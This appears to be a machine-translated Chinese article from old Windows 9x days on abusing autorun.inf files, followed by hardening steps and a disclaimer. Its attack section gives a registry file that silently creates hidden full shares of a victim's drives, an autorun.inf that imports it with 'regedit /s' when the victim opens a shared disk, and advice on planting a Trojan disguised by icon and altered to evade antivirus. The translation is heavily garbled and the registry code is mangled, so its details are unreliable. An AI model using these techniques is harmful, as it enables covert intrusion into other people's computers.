Analysis of attacks from autorun.inf files

xiaoxiao2021-03-18  197

Recently, online popularity enables all hard drives of each other to completely sharing or Zhongmou, because the application of autorun.inf files in hacking technology is still rare, and there are not many information, there are many people I feel very mysterious. This article tries to unlock this fan, so that you can fully understand this is not complicated but extremely interesting technology.

First, theoretical foundation

Friends who often use CD know that there are many discs to play into the optical drive, how do they do? The disc is automatically executed by one of the discs, mainly on two files, one is the autorun.inf file on the disc, and the other is CDVSD.vxd in the system file of the operating system itself. CDVSD.vxd will detect whether there is actions in the disc in the optical drive at any time. If any, you will start looking for the autorun.inf file under the root directory of the CD. If there is an autorun.inf file, execute the preset program inside.

Autorun.inf is not only allowed to automatically run the program, and the hard disk can be automatically run, the method is simple, first open the notepad, then right-click this file, select "Rename" in the pop-up menu, change the name to Autorun.inf, type the following in autorun.inf: [Autorun] // indicates that the autorun section starts, you must enter icon = c: /c.ico // give C.ICo Open = C: /1.exe // Specify the path and name to run the program, here is the 1.exe under this C

Save the file, press F5 to refresh the desktop, then look at the disk in "My Computer" (in this C drive), you will find that its disk icon is changed, double-click to enter the C drive, will also play the C disk automatically The next 1.exe file!

Explain: "[Autorun]" line is a must-have fixed format, "icon" line corresponds to the icon file, "c: /c.ico" is the icon file path and file name, you can change it when entering it. The path and file name of your image file. In addition, ". ICO" is an extension of the icon file. If you don't have such a file in your hand, you can use the picture software ACDSEE to convert other formatted software to the ICO format, or find a file named BMP file, will It can be renamed it directly to the ICO file.

"Open" line Specifies the files to be automatically run and their drive characters and paths. To specifically, if you want to change the hard disk without automatic play files, you should delete the "open" line, otherwise you will not open the hard disk because you can't find the automatic play file, you can only Right-click the button to select "Open" in the pop-up menu.

Please note that the saved file name must be "autorun.inf", preparing the autorun.inf file and the icon file must be placed in the root directory of the hard disk. Further, if your hard disk content is temporarily fixed, use flash to make an automatic play file, then edit the "autorun" file, then you have the coolest, the most personal hard drive.

I haven't finished here. Everyone knows that after some disc is put, we click on the right mouse button on its icon, and it will also have a characterful directory menu. If you can click on our hard drive to click on the mouse button, this effect is generated, which will be more special. In fact, the disc can have such an effect because there is two statements in the autorun.inf file: shell / logo = the right mouse button menu

Shell / Sign / Command = The file or command line to be executed

So, let the hard disk has a characterful directory menu, add the above statement in the autorun.inf file, example below: shell / 1 = day, the old shell / 1 / command / = Notepad ok.txt

After saving, press the F5 key to refresh, then right-click the hard disk icon, will find "Tian Ruo Skyland" in the pop-up menu (Figure 1), click on it, will automatically open "ok.txt" in the hard disk. file. Note: The above example assumes that the "ok.txt" file is in the root directory of the hard disk, NOTEPAD comes with the system. If the file to be executed is direct executable, add the executor file name directly after "Command /".

Figure 1 II, example

Let's take an example: If you sweep it to a 139-shared machine, and the other party only has a D disk, we want to share all the drives of all the drivers. First edit a registry file, open Notepad, type the following:

Regedit4 'This must be empty [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Network / LanMan / C $] "PATH" = "C: //" "=" "" "=" = "" "= DWORD: 00000000" Flags "= DWORD: 00000302" PARMLENC "= HEX:" PARM2ENC "= HEX:

[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Network / Lanman / D $] = "D: //" "" = "=" = DWORD: 00000000 "Flags" = dword: 00000302 "PARMLENC "= HEX:" PARM2ENC "= HEX:

[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Network / Lanman / C $] = "E: //" "" "=" "" = dword: 00000000 "Flags" = dword: 00000302 "PARMLENC "= HEX:" PARM2ENC "= HEX:

I only set to the E disk, if the other party has a lot of logical tricks, please set it. Save the above part as a Share.REG file standby. Pay special attention to regedit4 for uppercase and the top of the top, after which it is to be empty, and in the last line, I will remember to press the Enter key.

Then open the notepad, prepare an autorun.inf file, type the following:

[Autorun] open = regedit / s Share.REG / / Plus / S parameter does not display any information when importing

Save the autorun.inf file. Both files of Share.REG and Autorun.inf to the root of the other party's D disk, so that the other party will import Share.reg to the registry as long as the D disk is double-tapping, so that all drives will be all driven after the other computer is restarted. Completely shared.

If you want to let the other square Trojans, as long as in the autorun.inf file, change "Open = Share.reg" to "Open = Trojan server file name", then copy autorun.inf and configured Trojan service to copy it to Under the root of the other D disk, this does not need to run the Trojan service server in the other party, and only he doubles the D disk will run the Trojan! The benefits of this are obvious, that is, greatly adding the initiative of Trojans! It is important to know that many people are now very vigilant, unfamiliar files are easy to run, and this method is difficult to prevent. To illustrate, people who give you lower treashes will not be so stupid, don't give Trojans. Generally, they will change a name to Trojan server files, or listening to the system file name, then give Trojan Change the icon to make it look like txt files, zip files, or image files, etc., and finally modify the resource files of Trojans to identify anti-virus software (specific methods can be seen in this journal), when the service user letter is true When the Trojan has quietly invaded the system. In fact, it is not difficult to change the angle. The above means supplemented by the autorun.inf file, which is above, is seamless! Third, prevention method

The shared classification is completely determined by the Flags flag, and its key value determines the type of shared directory. When Flags = 0x302, restart the system, the directory sharing flag disappears, and there is no sharing on the surface, and it is actually a fully shared state. The online popular shared worm is used to use this feature. If you change "Flags" = dword: 00000302 to "Flags" = dword: 00000402, you can see the hard disk is shared, do you understand? Secret is here!

PARMLENC in the above code is encrypted password. The system uses 8-bit passwords when encrypting, and the "35 9A 4B A6 53 A9 D4 6A" is different, and if you want to find a password again or Calculate, then check the ASCII table to get the directory password. A software in the network software uses this property to make network password cracks, and you can see another computer shared password from one machine within the local area network.

Nethacker II software designed with TCP / IP protocol can pass through the Internet network, find a shared host, and then perform the appropriate operation. So when you get online through MODEM, you must be careful, because you are not careful, your host will be completely shared to each other.

The solution is to delete "C $", "D $", "D $", "E $", etc. below HKey_Local_Machine / Software / Microsoft / Windows / CurrentVersion / Network / Lanman. Then remove the VSERVER.VXD deletion below Windows / System, which is the file on the Microsoft network to share the virtual device driver, and then delete the vserver key value in HKEY_LOCAL_MACHINE / System / CurrentControlSet / Services / VXD / C. Safe.

In addition, closing the hard disk Autorun function is also one of the effective methods to prevent hacker intrusion. The specific method is to enter regedit in "Run" menu, open the Registry Editor, expand to the HKEY_CURRENT_USER / SOFTWARE / MICROSOFT / Windows / CurrentVersion / Policies / Exploer primary key, find "NodriveTyPeautorun" in the right pane. This is this button to determine if the autorun feature of the CDROM or hard disk is executed. Double-click "NODRIVETYPEAUTORUN", in the default state (ie you do not have an autorun feature), you can see "NodriveTyPeautorun" default key value of 95,00,00,00, as shown in the figure (Figure 2). The first value "95" is a hexadecimal value, which is all forbidden to automatically run the device. Transfer "95" to binary is 10010101, each of which represents a device, and different devices in Windows use the following values:

figure 2

Device Name Sequence Position Device Name Device Name Meaning DKIVE_UNKNOWN 0 1 01h Unrecognized Device Type DRIVE_NO_ROOT_DIR 1 0 02H No rooted drive (Drive without root Directory) Drive_removable 2 1 04H Removable drive (Removable Drive) Drive_Fixed 3 0 08H Fixed Drive (Fixed Drive) Drive_Remote 4 1 10H Network Drive (NETWORK DRIVE) DRIVE_CDROM 5 0 20H CD-ROM (CD-ROM) Drive_ramdisk 6 0 40H RAM Disk (RAM Disk) Reserved 7 1 80h Undefined Drive Type ( Not Yet Specified Drive DISK)

The value is "0" in the table listed above, indicating that the device is running, the value is "1" indicates that the device does not run (by default, Windows is prohibited from 80h, 10h, 4h, 01h), these devices are automatically run, these numerical values ​​are justified. The hexadecimal 95h, so the NODRIVETYPEAUTORUN "The default key value is 95,00, 100). It is not difficult to see by the above analysis. By default, the device automatically run is drive_no_root_dir, drive_fixed, drive_cdrom, drive_ramdisk this Four reserved devices, so to prohibit hard drives from running autorun.inf files, you must set the value of DRIVE_FIXEDs to 1 because Drive_Fixed represents a fixed drive, that is, a hard disk. So, the original 10010101 (in the table " The value "column is seen in the lower up) to become a binary 10011101, and turn to hexadecimal 9D. Now, the key value of" NODRIVETYPEAUTORUN "is changed to 9D, 00, 00, 00, turn off the registry editor After restarting the computer, turn off the autorun feature of the hard disk.

If you understand, then you must know how to ban the CD Autorun function, right! That is to set DRIVE_CDROM to 1, the first value in the "NODRIVETYPEAUTORUN" key value is 10110101, which is the hexadecimal B5. When the first value is changed to B5, turn off the registry editor, turn off the CDROM's Autorun function after restarting the computer. If you only want to prohibit the autorun function of the software disc, the automatic playback capability of the CD audio disc is retained. At this time, only the key value of "NODRIVETYPEAUTORUN" is required to: BD, 00, 00, 00. If you want to recover the autorun function of the hard disk or the optical drive, you can perform the reverse direction operation.

In fact, the autorun.inf file does not need the autorun.inf file in the root directory, so we can complete the hard drive's autorun function, so that even if there is autorun.inf file in the root directory of the hard disk, Windows will not To run the program specified, it can achieve the purpose of preventing hackers from using the autorun.inf file intrusion.

In addition, we should also make Windows display hidden sharing. Everyone knows that when you set up a sharing in Windows 9x, you can hide the sharing by adding the "$" symbol after the shared name. For example, when we set up a share of a computer named Share, we set the shared name to C $. This way we will not see the shared C drive, only to access this share by entering the exact path of the shared. However, we only need to modify the msnp32.dll files in your computer. You can make Windows show hidden sharing.

Since MSNP32.dll is called under Windows, this file cannot be modified directly, so we must copy the msnp32.dll to the C disc and change the name MSNP32, msnp32.dll under the C: / Windows / System folder. Run UltraEdit and other hexadecimal editor open MSNP32, find "24 56 E8 17" (located at offset address 00003190 ~ 000031A0), after finding "24" to "00", then save, shut down UltraEdit. Restart the computer into the DOS mode, enter Copy c: /msnp32.dll c: /windows/system/msnp32.dll at the command prompt, restart to Windows, now double-click Share to see the hidden shared.

Finally, you must remind you that hacker software such as Nethacker II designed by TCP / IP protocol can pass through the Internet network, find the shared host, and then perform the appropriate operation. So when you get online through MODEM, you must be careful, because you are not careful, your host will be completely shared to each other. The method of preventing such things is nothing more than regular inspection system, putting patch to the system, often using anti-black anti-virus software, open the firewall, pay attention to an abnormal phenomenon, pay attention to the contents of the autorun.inf file, turn off the sharing or do not set to complete sharing And plus complex shared passwords.

Disclaimer: The purpose of this article is to make everyone clear understanding of the popular hackers' means, enhance your own protection awareness, so please don't use this article to go to the illegal things, remember: don't want, don't do it!

转载请注明原文地址:https://www.9cbs.com/read-130015.html

New Post(0)